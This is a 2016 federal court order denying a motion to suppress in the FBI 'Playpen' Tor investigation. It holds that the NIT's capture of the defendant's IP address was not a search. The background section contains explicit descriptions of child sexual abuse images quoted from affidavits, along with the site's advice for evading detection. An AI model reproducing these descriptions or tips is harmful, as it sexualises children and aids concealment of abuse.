From Casetext: Smarter Legal Research

United States v. Acevedo-Lemus

UNITED STATES DISTRICT COURT CENTRAL DISTRICT OF CALIFORNIA SOUTHERN DIVISION
Aug 8, 2016
Case No.: SACR 15-00137-CJC (C.D. Cal. Aug. 8, 2016)

Summary

holding the NIT's acquisition of Defendant's IP address was not a search because "Defendant could not have had a subjective expectation of privacy in his IP address" and "[s]ociety [d]oes [n]ot [r]ecognize Defendant's [e]xpectation as [r]easonable"

Summary of this case from United States v. Schuster

Opinion

Case No.: SACR 15-00137-CJC

08-08-2016

UNITED STATES OF AMERICA, Plaintiff, v. JOSE ANTONIO ACEVEDO-LEMUS, Defendant.


ORDER DENYING DEFENDANT'S MOTION TO SUPPRESS

I. INTRODUCTION AND BACKGROUND

In December 2014, a foreign law enforcement agency advised the FBI that a known child pornography website called "Playpen" appeared to be associated with a United States-based IP address. (Dkt. 32 Ex. A at 6-37 ["Macfarlane Aff."] ¶ 28.) An ensuing investigation confirmed that Playpen was hosted by a server located in North Carolina. (Id.) The FBI obtained a search warrant for the location of the server in January 2015, seized the server, and found a copy of Playpen on it. (Id.)

"An IP address is a number that an Internet Service Provider assigns to devices that are connected to the Internet. . . . The Internet Service Provider to which an internet user subscribes can correlate the user's IP address to the user's true identity." Third Degree Films, Inc. v. John Does 1 through 4, No. 12-CV-1849 BEN (BSG), 2013 WL 3762625, at *1 (S.D. Cal. July 16, 2013).

Playpen operated as a "hidden service" located on an anonymity network known as "The Onion Router," or "Tor." (Macfarlane Aff. ¶¶ 6-7.) Ordinarily, public websites log the IP addresses of all visiting users. It is therefore an easy task for law enforcement to discover who has visited a certain website—or, alternatively, which websites a computer with a particular IP address has visited. The Tor network does not operate this way. Instead, to even access the network, a user must first download and install particular software, which subsequently shields the user's IP address by relaying it among "nodes"—computers run by volunteers all over the world. (Id. ¶ 8.) When a user visits a website located on the Tor network—like Playpen, for example—his actual IP address is not shown. Instead, Playpen can only see the IP address of the Tor "exit node"—the final relay computer which sent the user's communication to Playpen. (Id.) This deliberate concealment of IP addresses makes it exceptionally difficult for law enforcement to determine who has visited a website or hidden service located on the Tor network, as there is no practical way to trace a user's IP address back through the Tor nodes. (Id.)

Once on the Tor network, a user must know a website's particular web address to visit it. (He may not, as on the traditional or "open" Internet, simply perform an Internet search for certain material, since websites on the Tor network are not indexed like websites on the open Internet.) (Macfarlane Aff. ¶ 10.) Tor users must obtain web addresses from each other, or by viewing Internet postings describing the content available on certain websites. (Id.) The Tor network contains a "hidden service" page that is dedicated to pedophilia and child pornography, and Playpen's web address is listed on that page. (Id.) It would be highly unusual for a user to stumble upon Playpen. He would first have to elect to download Tor software and access the "dark web," where Tor websites are hosted, and then he would be required to affirmatively locate Playpen's web address before reaching Playpen.

Users who entered Playpen's web address arrived at a main page which contained images of two partially clothed prepubescent females with their legs spread apart, along with text stating, "No cross-board reposts, .7z preferred, encrypt filenames, include preview, Peace out." (Macfarlane Aff. ¶ 12.) This text apparently referred to a ban on posting material from other message boards, an indication of which file compression method was preferable, and instructions on what to include with posted materials. (Id.) Adjacent to the text were fields for users to enter login credentials, and a hyperlink for new users to "register an account with Playpen." (Id.) Upon clicking the "register an account" hyperlink, users were taken to additional text which explained that Playpen required an email address but that rather than entering their real email address, users should simply enter a made-up address: "something that matches the xxx@yyy.zzz pattern." (Id. ¶ 13.) Users who successfully registered for the service by entering a false email address were then taken to a page containing Playpen's forums and subforums. (Id. ¶ 14.)

Playpen was entirely devoted to the publication and exchange of child pornography. Its forums, where Playpen users could post materials, bore titles such as "Jailbait Videos" (of both "Girls" and Boys"), "Pre-teen Videos," "Pre-teen Photos," and "Webcams" (again, divided by gender), "Family Playpen - Incest," and "Toddlers." (Macfarlane Aff. ¶ 14.) Playpen also maintained a "Kinky Fetish" forum that included subforums like "Bondage," "Peeing," "Scat," "Spanking," "Voyeur," and "Zoo." (Id.) In addition to these forums and subforums, Playpen included three other important features. The first, called "Playpen Image Hosting," allowed Playpen users to upload links to images of child pornography. (Id. ¶ 23.) The links were then available to all registered Playpen users. (Id.) The second, "Playpen File Hosting," similarly allowed users to upload videos of child pornography, which were then available to Playpen registered users. (Id. ¶ 24.) The third, "Playpen Chat," permitted users to post links to child pornography for other users who were logged into Playpen Chat at the same time. (Id. ¶ 25.) The link to Playpen Chat was on Playpen's main index page. (Id.)

"Jailbait" refers to underage but post-pubescent minors.

The FBI's review of Playpen's forums and subforums, as well as its Playpen Image Hosting, Playpen File Hosting, and Playpen Chat features, revealed links to numerous depictions of what appeared to be child pornography. A representative sampling of those depictions is as follows:

• An image of a prepubescent or early pubescent female being orally penetrated by the penis of a naked male. (Macfarlane Aff. ¶ 18.)

• A video of a prepubescent female, naked from the waist down, being anally penetrated by the penis of a naked adult male. (Id. ¶ 18.)

• Images focused on the nude genitals of a prepubescent female. (Id. ¶ 23.)

• A video of an adult male masturbating and ejaculating into the mouth of a nude prepubescent female. (Id. ¶ 24.)

• An image of two prepubescent females lying on a bed with their genitals exposed. (Id. ¶ 25.)

• An image of four females, including at least two prepubescent females, performing oral sex on one another. (Id. ¶ 25.)

The FBI seized a copy of the server hosting Playpen in January 2015. (Macfarlane Aff. ¶ 28.) The nature of the Tor network, however, prevented the FBI from identifying Playpen users, since Playpen's "logs of member activity . . . contain[ed] only the IP addresses of Tor 'exit nodes' utilized by board users." (Id. ¶ 29.) Accordingly, on February 19, 2015, the FBI executed a court-authorized search at the Naples, Florida residence of the suspected administrator of Playpen. (Id. ¶ 30.) The administrator was apprehended, and the FBI managed to assume administrative control of Playpen. (Id.) The FBI then devised a plan to determine the identities of Playpen users: it would, while running Playpen from a server in Virginia, reconfigure the website to deploy a network investigative technique ("NIT") any time a user downloaded content from Playpen. (Id. ¶ 33.) As Douglas Macfarlane, an FBI Special Agent, subsequently explained,

In the normal course of operations, websites send content to visitors. A user's computer downloads that content and uses it to display web pages on the user's computer. [Upon deployment of the NIT, Playpen,] which will be located in Newington, Virginia, . . . would augment that content with additional computer instructions. When a user's computer successfully downloads those instructions from [Playpen], the instructions, which comprise the NIT, are designed to cause the user's "activating" computer to transmit certain information to a computer controlled by or known to the government.
(Macfarlane Aff. ¶ 33.) Specifically, the NIT would reveal to the government seven items:
1. The activating computer's IP address, and the date and time that the NIT determined what that IP address was;

2. A unique identifier generated by the NIT to distinguish the data from that of other activating computers;

3. The type of operating system running on the computer;

4. Information about whether the NIT had already been delivered to the computer;
5. The activating computer's host name;

6. The activating computer's operating system username; and

7. The activating computer's Media Access Control ("MAC") address.
(Id. ¶ 34.)

On February 20, 2015, the FBI sought a warrant to deploy the NIT for thirty days. (Dkt. 32 Ex. A [the "NIT Warrant"].) The warrant application explained the nature of Playpen, the investigative difficulties presented by Playpen users' use of the Tor network, the operation of the NIT, and the fact that the NIT could cause activating computers—"wherever located"—to disclose the seven pieces of information noted above. (See generally Macfarlane Aff.; see also id. ¶ 48.) The warrant was signed by Theresa Carroll Buchanan, a United States Magistrate Judge for the Eastern District of Virginia. (NIT Warrant at 1.)

Deployment of the NIT Warrant revealed that a Playpen user with the username "DarkYogi" viewed at least 175 threads on Playpen during the deployment of the NIT, including at least two threads containing files that appeared to the government to be child pornography. (Dkt. 32 Ex. C at 1-30 ["Wrathall Aff."] ¶ 26.) The first file depicts a nude white prepubescent girl with her mouth open and her hand on an adult male erect penis that appears to be ejaculating into the girl's mouth. (Id.) The second file contains a visual depiction of a female white toddler with no pants on being vaginally penetrated by the erect penis of an adult male. (Id.) The NIT acquired the IP address of the user's computer, which—a search of publicly available websites revealed—was operated by Time Warner Cable. (Id. ¶¶ 27-28.) In March 2015, the government served an administrative subpoena on Time Warner, who indicated that the IP address in question was assigned to Defendant Jose Acevedo at a residence in Anaheim, California. (Id. ¶ 29.) The FBI confirmed that Defendant indeed lived at the Anaheim address and then obtained a search warrant authorizing the search of Defendant's home for evidence of child pornography. (Id. ¶¶ 30-33; see generally id.) The FBI executed the search, interviewed Defendant, and seized a Hewlett Packard computer with a Western Digital hard drive and a SanDisk Cruzer thumb/flash drive. The hard drive and flash drive were found to contain 210 videos of child pornography and 31 still images of child pornography. A grand jury subsequently returned an indictment against Defendant for two counts of knowingly possessing child pornography. (See Dkt. 1.)

Defendant now moves for the suppression of all evidence stemming from the NIT Warrant. He argues that that warrant (1) violated the Fourth Amendment and (2) exceeded the magistrate's authority under Federal Rule of Criminal Procedure 41(b). (Dkt. 28.) The Court concludes that the FBI's acquisition of the key piece of information here—Defendant's IP address—was not a search under the meaning of the Fourth Amendment, and therefore did not require a warrant. The Court also concludes that in any event, suppression would not be an appropriate remedy for a Fourth Amendment violation in these circumstances. Accordingly, Defendant's motion is DENIED.

II. DISCUSSION

A. The NIT's Acquisition of Defendant's IP Address Was Not a Search

The Fourth Amendment to the U.S. Constitution provides that "[t]he right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated." "As a prerequisite to establishing the illegality of a search under the Fourth Amendment, a defendant must show that he had a reasonable expectation of privacy in the place searched." United States v. Heckencamp, 482 F.3d 1142, 1146 (9th Cir. 2007). A defendant may do so by demonstrating a "subjective expectation that his activities would be private [and that] his expectation was one that society is prepared to recognize as reasonable." United States v. Bautista, 362 F.3d 584, 589 (9th Cir. 2004). Defendant can do neither here.

1. Defendant Lacked a Subjective Expectation of Privacy in His IP Address Because He Routinely Disclosed It to Others

First, Defendant could not have had a subjective expectation that his IP address would remain private because he routinely disclosed it to third parties, including Time Warner, the Tor network, and websites he visited on the open Internet. "What a person knowingly exposes to the public, even in his own home or office, is not a subject of Fourth Amendment protection." Katz v. United States, 389 U.S. 347, 351 (1967). Applying this principle, the Ninth Circuit has on a number of occasions concluded that Internet users do not have reasonable expectations of privacy in their own IP addresses or the IP addresses of the websites they visit. See United States v. Forrester, 512 F.3d 500, 510 (9th Cir. 2007) ("Internet users have no expectation of privacy in the . . . IP addresses of the websites they visit because they should know that this information is provided to and used by Internet service providers for the specific purpose of directing the routing information."); Heckencamp, 482 F.3d 1142, 1148 (holding that a defendant had "no reasonable expectation of privacy" in "network logs" that contained his computer's IP address); United States v. Martinez, 588 Fed. Appx. 741 (Mem.) (9th Cir. 2014) (unpublished) ("The use by law enforcement of proprietary forensic software packages that revealed information, such as hash values and IP addresses, did not make the search unlawful, as there was no reasonable expectation of privacy in this information[.] It was available to others, even though they may not have known how to view it."). Multiple district courts who have entertained motions to suppress evidence stemming from the NIT Warrant are in accord. United States v. Matish, --- F. Supp. 3d. ----, 2016 WL 3545776, at *21 (E.D. Va. June 23, 2016) (holding that the FBI "did not need to obtain a warrant before deploying the NIT" because the defendant had "no reasonable expectation of privacy in his IP address"); United States v. Werdene, --- F. Supp. 3d ----, 2016 WL 3002376, at III.B (E.D. Pa. May 18, 2016) (holding that because the defendant "did not have a reasonable expectation of privacy in his IP address, the NIT cannot be considered a 'search' within the meaning of the Fourth Amendment"); United States v. Michaud, Case No. 3:15-cr-05351-RJB, 2016 WL 337263, at *7 (W.D. Wash. Jan. 28, 2016) ("[The defendant] has no reasonable expectation of privacy of [sic] the most significant information gathered by deployment of the NIT, [his] assigned IP address[.]"); but see United States v. Darby, --- F. Supp. 3d ----, 2016 WL 3189703, at *6 (E.D. Va. June 3, 2016) (concluding that the NIT constituted a search, but noting that the government did not argue otherwise); United States v. Arterbury, Case No. 15-CR-182-JHP (N.D. Okla. Apr. 25, 2016) (report and recommendation) (concluding that the defendant had a reasonable expectation of privacy in his IP address because the government obtained the information from his computer, and not from a third party).

Although the NIT seized seven pieces of information, the parties apparently agree that the crucial piece of information was Defendant's IP address. The warrant to search Defendant's home makes clear that it was this information, not anything else identified by the NIT, that led the FBI to Defendant. (Wrathall Aff. ¶¶ 7; 27-33.) The search warrant did not rely on any of the other six pieces of information, and the Court will limit its analysis to the fruits of the IP address.

Two peculiar facts in this case—first, that the FBI obtained Defendant's IP address from his computer, not from a third party, and second, that Defendant attempted to obscure his IP address by using the Tor network—do not alter this conclusion.

First, it does not matter that the government procured Defendant's IP address from his computer as opposed to getting it from a third party because an IP address is not a private physical feature of a computer, but a commonly disclosed digital one assigned by a third party. When a consumer purchases a computer, takes it home, opens it up, and turns it on, that computer does not have an IP address. Instead, it is assigned an IP address by an internet service provider (like Time Warner) when it connects to a particular network, and that IP address may change if the computer connects to a different network. See Matish, 2016 WL 3545776, at *21 ("[The defendant's] IP address was not located on his computer, indeed, it appears that computers can have various IP addresses depending on the networks to which they connect."). It is not completely accurate to say that the government accessed Defendant's computer to retrieve his IP address, as the IP address is not a physical component of the computer. Instead, when Defendant downloaded content from Playpen, the government sent along some code that directed Defendant's computer to disclose to the government a feature of Defendant's connection—his IP address. Cf. id. at *21 ("[The defendant's] IP address was revealed in transit when the NIT instructed his computer to send other information to the FBI."). And—crucially—the FBI was only able to deploy the NIT to Defendant's computer after Defendant sought Playpen out. The FBI did not come looking for Defendant. Instead, it waited until he came to them and engaged in illicit activity by downloading content from Playpen. The government allowed him to download that content but also sent him home with an unexpected souvenir: code that would reveal his IP address.

In that sense this case is very much like United States v. Knotts, 460 U.S. 276 (1983). There, the government—with a storeowner's consent—installed a "beeper" in a drum of chloroform subsequently purchased by an individual whom the government suspected of drug production. Id. at 277. After the drum was purchased and placed in the trunk of a vehicle, agents followed the vehicle, both maintaining visual contact and monitoring electronic signals from the beeper. Id. at 278. Eventually, the vehicle made "evasive maneuvers," and both visual and electronic contact were lost. Id. A helicopter with another monitor later picked up the signal, however, and tracked it to a cabin. Id. After performing additional surveillance of the cabin, the government obtained a residential search warrant, based on part on the electronic tracking of the chloroform drum. Id. The search revealed a drug lab, and the defendant moved to suppress, arguing that the tracking of the beeper was an unreasonable search.

The Supreme Court refused to suppress the evidence. It explained that the government had made "limited use" of the beeper, acquiring only information that the driver of the vehicle had "voluntarily conveyed" to the public—namely, the location of the vehicle and its ultimate destination. Id. at 281. (Nothing in the record indicated that the government had received or relied upon beeper signals after concluding that the "drum containing the chloroform had ended its automotive journey," id. at 284-85.) True, the "failure of visual surveillance" meant that the beeper gave law enforcement officials information they could not have acquired otherwise. Id. at 285. The crucial fact in the Supreme Court's view, however, was that the information law enforcement did acquire was ordinarily public, and "[n]othing in the Fourth Amendment prohibited the police from augmenting the sensory faculties bestowed upon them at birth with such enhancement as science and technology afforded them." Id. at 282. And although the Knotts Court warned that "dragnet type law enforcement practices" involving the use of beepers may present a more difficult constitutional question, it concluded that the government's monitoring of the beeper constituted neither a search nor a seizure under the meaning of the Fourth Amendment. Id. at 285.

Knotts was recently distinguished by United States v. Jones, where the Supreme Court ruled that the warrantless installation of a GPS tracker on a suspect's car was a search. 132 S. Ct. 945 (2012). That case was different from Knotts, the Supreme Court explained, in two ways. First, the beeper in Knotts was installed in the drum of chloroform before the drum came into the defendant's possession. In Jones, by contrast, the GPS device was installed on a car already owned and possessed by the defendant's wife. Jones, 132 S. Ct. at 952 (reasoning that "Jones, who possessed the Jeep at the time the Government trespassorily inserted the information-gathering device, [wa]s on much different footing" from the defendants in Knotts and another beeper case, United States v. Karo, 468 U.S. 705 (1984).) Second, the Jones Court noted the Knotts Court's emphasis on the "limited use" of the beeper, as well as its reservation of the constitutionality of warrantless "dragnet type law enforcement practices," see Knotts, 460 U.S. at 284. Jones, the Supreme Court said, involved a long-term, "dragnet-style" search and was therefore not a "limited use" case like Knotts. Jones, 132 S. Ct. at 952 n.6.

These two distinctions illustrate why Knotts, not Jones, is the correct analogue in this case. First, as in Knotts, the information-gathering technique used here was originally installed on something controlled by the government—Playpen content—and only then transferred to Defendant's computer, at Defendant's request. Defendant is therefore "on much different footing" than the defendant in Jones, 132 S. Ct. at 952, and instead is like the defendant in Knotts who unknowingly purchased the bugged chloroform. And second, the NIT obtained very limited information from Defendant's computer. It did not, for example, search for files containing child pornography or otherwise inspect the computer's contents. Indeed, its crucial operation was only to acquire a piece of information, normally public and often disclosed to third parties, that Defendant had managed to successfully obscure from the FBI: his IP address.

It also does not matter that Defendant tried to shield his IP address from the government, since he nonetheless disclosed that information to the initial Tor "entry node." As the Werdene court explained, "a necessary aspect of Tor is the initial transmission of a user's IP address to a third-party"—the operator of the initial Tor node—and the fact that a user's IP address is "subsequently bounced from node to node within the Tor network to mask his identity does not alter the analysis of whether he had an actual expectation of privacy in that IP address," which he had initially disclosed to a stranger. Werdene, 2016 WL 3002376, at III.A; see also United States v. Farrell, No. CR15-029RAJ, 2016 WL 705197, at *2 (W.D. Wash. Feb. 23, 2016) (holding that a defendant had no expectation of privacy in his IP address, which he concealed through Tor, because "in order for a prospective user to use the Tor network they must disclose information, including their IP addresses, to unknown individuals running Tor nodes"). Here again, Knotts is on point. Just as the Supreme Court would not countenance the possibility that the Knotts defendant's "evasive" driving maneuvers could permit him to escape law enforcement's technological tools, so too Defendant may not escape responsibility here merely because he managed to disclose his IP address to Tor but not to the government. That result was unacceptable more than thirty years ago in Knotts, and it is unacceptable today. Mere disclosure by a computer of its IP address—a hallmark of Internet communication—does not become a Fourth Amendment search when the government happens to be the party to whom disclosure occurs. Simply put, Defendant could not have had a subjective expectation of privacy in his IP address.

2. Society Does Not Recognize Defendant's Expectation as Reasonable

Defendant also cannot demonstrate that any subjective expectation of privacy he may have had in his IP address is an expectation that "society is prepared to recognize as 'reasonable,'" Katz, 389 U.S. at 361. Defendant opened his computer, got on the Internet, and went searching for child pornography. In an attempt to evade detection by law enforcement, he used Tor, hoping to mask his IP address from government investigators. American society abhors child pornography, and it does not view Defendant's deceptive efforts to conceal his viewing of child pornography as establishing a reasonable expectation of privacy. Werdene, 2016 WL 3002376, at III.B (noting that the defendant's "use of Tor to view and share child pornography is not only an activity that society rejects, but one that it seeks to sanction"); Matish, 2016 WL 3545776, at *24 ("Society thus is unprepared to recognize any privacy interests [the defendant] attempts to claim as reasonable in his search for pornographic material."); cf. Rakas v. Illinois, 439 U.S. 128, 143 n.12 (1978) ("[A] burglar plying his trade in a summer cabin during the off season may have a thoroughly justified subjective expectation of privacy, but it is not one which the law recognizes as 'legitimate.'"). Contrary to his assertions, Defendant cannot conceal his deviant behavior through Internet tricks. Werdene, 2016 WL 3002376, at III.B (rejecting the defendant's attempt to "serendipitously receive Fourth Amendment protection because he used Tor in an effort to evade detection"); Matish, 2016 WL 3545776, at *24 ("[The defendant] should not be rewarded for allegedly obtaining contraband through his virtual travel through interstate commerce on a Tor hidden service."). Indeed, this Court agrees with the Matish court that the government "should be able to use the most advanced technological means to overcome criminal activity that is conducted in secret." Matish, 2016 WL 3545776, at *24. Law enforcement cannot afford to be hamstrung by technologically creative criminals, especially when what is at risk is the sexual exploitation and sadistic abuse of children.

B. Suppression is Unwarranted in Any Event

Suppression would not be the proper remedy regardless of whether the FBI's deployment of the NIT was a search. "[S]uppression is not an automatic consequence of a Fourth Amendment violation. Instead, the question turns on the culpability of the police and the potential of exclusion to deter wrongful police conduct." Herring v. United States, 555 U.S. 135, 137 (2009). Defendant argues that the evidence stemming from the NIT Warrant must be suppressed because the NIT Warrant inappropriately authorized an out-of-district search of his computer. See Fed. R. Crim. P. 41(b) ("[A] magistrate judge with authority in the district . . . has authority to issue a warrant to search for and seize a person or property located within the district."). He is incorrect.

Defendant's alternative argument—that the NIT Warrant failed the Fourth Amendment's particularity requirement—is without merit. That argument has been rejected, as near as the Court can tell, by every federal court to consider it. See, e.g., Matish, 2016 WL 3545776, at *14 (finding that "the NIT Warrant did not violate the Fourth Amendment's particularity requirement" because "there existed a fair probability that anyone accessing Playpen possessed the intent to view and trade child pornography"); Michaud, 2016 WL 337263, at *5 ("Although the FBI may have anticipated tens of thousands of potential suspects as a result of deploying the NIT, that does not negate particularity, because it would be highly unlikely that [Playpen] would be stumbled upon accidentally, given the nature of the Tor network."); United States v. Epich, Case No. 15-CR-163-PP, 2016 WL 953269, at *2 (E.D. Wis. Mar. 14, 2016) (concluding that the NIT Warrant satisfied the particularity requirement because it "explained who was subject to the search, what information the NIT would obtain, the time period during which the NIT would be used, and how it would be used, as well as bearing attachments describing the place to be searched and the information to be seized").

1. Any Rule 41 Violation Does Not Require Suppression

In the Ninth Circuit, suppression is only available for Rule 41 violations if "1) the violation rises to a constitutional magnitude; 2) the defendant was prejudiced, in the sense that the search would not have occurred or would not have been so abrasive if law enforcement had followed the Rule; or 3) officers acted in intentional and deliberate disregard of a provision in the Rule." United States v. Weiland, 420 F.3d 1062, 1071 (9th Cir. 2005). For reasons the Court has already explained, no violation of "constitutional magnitude" has occurred here because Defendant had no reasonable expectation of privacy in his IP address. See Werdene, 2016 WL 3002376, at III.B ("Since [the defendant] did not have a reasonable expectation of privacy in his IP address, . . . the violation [of Rule 41] is therefore not constitutional."). Nor was Defendant prejudiced by any potential Rule 41 violation. After all, the FBI could have installed copies of Playpen in every judicial district in the country (there are 94) and then secured a corresponding number of Rule 41 warrants. It only chose not to do so because of the enormous burden and expense of such an undertaking. But the fact remains that the issuance of a modified NIT Warrant that fully complied with even a narrow reading of Rule 41 was entirely possible. Defendant's argument that he was prejudiced by this search boils down to an assertion that his consumption of child pornography was totally immunized by his use of Tor, and there was nothing the government could do about it. Not so.

Finally, there is no reason to believe that the FBI intentionally and deliberately violated Rule 41 by seeking the NIT Warrant. As an initial matter, there are credible arguments to be made that Rule 41 was never violated at all, casting doubt on Defendant's assertion that the FBI was knowingly flouting the Rule. Rule 41(b)(4), for example, provides that a magistrate judge may "issue a warrant to install within the district a tracking device" and that the warrant "may authorize use of the device to track the movement of a person or property located within the district, outside the district, or both[.]" It is not a stretch to say that the NIT functioned as a permissible "tracking device" attached to child pornography that was subsequently downloaded by Defendant when his computer sent a request to the Playpen server. Indeed, at least two district courts have agreed with this position. See Matish, 2016 WL 3545776, at *18 ("[T]he NIT Warrant authorized the FBI to install a tracking device on each user's computer when that computer entered the Eastern District of Virginia . . . [w]hen that computer left Virginia—when the user logged out of Playpen—the NIT worked to determined its location . . . all relevant events occurred in Virginia."); United States v. Darby, --- F. Supp. 3d ----, 2016 WL 3189703, at *12 (E.D. Va. June 3, 2016) (holding that Rule 41(b)(4) authorized the NIT Warrant because "[u]sers of Playpen digitally touched down in the Eastern District of Virginia" and the FBI was then entitled to install a tracking device); but see Michaud, 2016 WL 337263, at *6 (rejecting the argument that Rule 41(b)(4) permitted the NIT Warrant); United States v. Levin, --- F. Supp. 3d ----, 2016 WL 2596010, at *6 (D. Mass. May 5, 2016) (same). The fact that courts are presently divided over whether the NIT Warrant even violated Rule 41 is compelling evidence that the FBI did not intentionally and deliberately violate that Rule by seeking the warrant in the first instance.

Moreover, as the government points out, the Supreme Court has recently recommended that Rule 41 be modified to explicitly permit magistrate judges to "issue a warrant to use remote access to search electronic storage media and to seize or copy electronically stored information located within or outside that district if . . . the district where the media is located has been concealed through technological means." (Dkt. 38 Ex. B at 6.) Defendant takes this proposed amendment to mean that the FBI knew it was operating outside Rule 41. But the amendment actually cuts the other way. It would be strange indeed for the Court to suppress the evidence in this case in the face of a strong signal from the Supreme Court that Rule 41 should explicitly permit the issuance of warrants like the NIT Warrant. The severe penalty of suppression should not be levied against the government (and society generally) merely because the government had the good sense to seek an amendment to Rule 41.

2. The Good Faith Exception Applies

Even in the presence of a violation, the good faith exception to the exclusionary rule would bar suppression here. Application of the exclusionary rule is only appropriate in those "unusual cases" where suppression will "deter police misconduct." United States v. Leon, 468 U.S. 897, 916, 918 (1984). When police officers "acting with objective good faith ha[ve] obtained a search warrant from a judge or magistrate and acted within its scope," there is "no police illegality and thus nothing to deter." Id. at 920-21.

Traditional limitations on the exclusionary rule, like the good faith exception and the balancing of the costs of suppression against any violation, still apply in the Rule 41 context, since the suppression provisions of Rule 41 are "no broader than the constitutional rule," Alderman v. United States, 394 U.S. 165, 173 n.6 (1969). --------

Here, Defendant's technical sophistication meant that to adequately prosecute the child pornography laws, FBI agents were required to design a tool that was up to the task. The NIT was the solution. FBI agents were, at every juncture, up front with the magistrate judge about how the NIT worked, what it would seize from "activating computers," and where "activating computers" could be located. (Macfarlane Aff. ¶ 48.) That Rule 41 may not yet be a perfect fit for our technological world does not mean that the FBI agents here acted in bad faith.

The costs of suppression also weigh against that remedy in this case. Defendant proposes that he and other viewers and distributors of child pornography can escape capture and continue their viewing and distribution so long as they use Tor, while society and the children victimized by their behavior continue to suffer. That would be repugnant to justice and the purpose of law. As the Supreme Court has explained,

The [good faith] analysis must also account for the substantial social costs generated by the [exclusionary] rule. Exclusion exacts a heavy toll on both the judicial system and society at large. It almost always requires courts to ignore reliable, trustworthy evidence bearing on guilt or innocence. And its bottom-line effect, in many cases, is to suppress the truth and set the criminal loose in the community without punishment. Our cases hold that society must swallow this bitter pill when necessary, but only as a last resort. For exclusion to be appropriate, the deterrence benefits of suppression must outweigh its heavy costs.
Davis v. United States, 564 U.S. 229, 237 (2011) (internal citations and quotation marks removed). Considering the unspeakable harm caused by child pornography, and the creative and limited conduct of the FBI that was undertaken to mitigate that harm, the Court has no trouble concluding that suppression is entirely unwarranted here.

III. CONCLUSION

For the foregoing reasons, Defendant's motion to suppress is DENIED.

DATED: August 8, 2016

/s/_________

CORMAC J. CARNEY

UNITED STATES DISTRICT JUDGE


Summaries of

United States v. Acevedo-Lemus

UNITED STATES DISTRICT COURT CENTRAL DISTRICT OF CALIFORNIA SOUTHERN DIVISION
Aug 8, 2016
Case No.: SACR 15-00137-CJC (C.D. Cal. Aug. 8, 2016)

holding the NIT's acquisition of Defendant's IP address was not a search because "Defendant could not have had a subjective expectation of privacy in his IP address" and "[s]ociety [d]oes [n]ot [r]ecognize Defendant's [e]xpectation as [r]easonable"

Summary of this case from United States v. Schuster

observing that "the NIT obtained very limited information from [d]efendant's computer" and "did not, for example, search for files containing child pornography or otherwise inspect the computer's contents" but rather its "crucial operation" was to obtain the defendant's IP address, which is information that is "normally public and often disclosed to third parties"

Summary of this case from United States v. Scanlon

observing that "there are credible arguments to be made that Rule 41 was never violated at all," but finding that even if the Rule were violated, there was no justification for suppressing the evidence

Summary of this case from United States v. Jean
Case details for

United States v. Acevedo-Lemus

Case Details

Full title:UNITED STATES OF AMERICA, Plaintiff, v. JOSE ANTONIO ACEVEDO-LEMUS…

Court:UNITED STATES DISTRICT COURT CENTRAL DISTRICT OF CALIFORNIA SOUTHERN DIVISION

Date published: Aug 8, 2016

Citations

Case No.: SACR 15-00137-CJC (C.D. Cal. Aug. 8, 2016)

Citing Cases

United States v. Scanlon

Although an IP address may be obtained from a third party provider and therefore arguably carries with it a…

United States v. Wheeler

" Id., at *8 (emphasis in original). And see United States v. Darby, 190 F. Supp. 3d 520, 528-30 (E.D. Va.…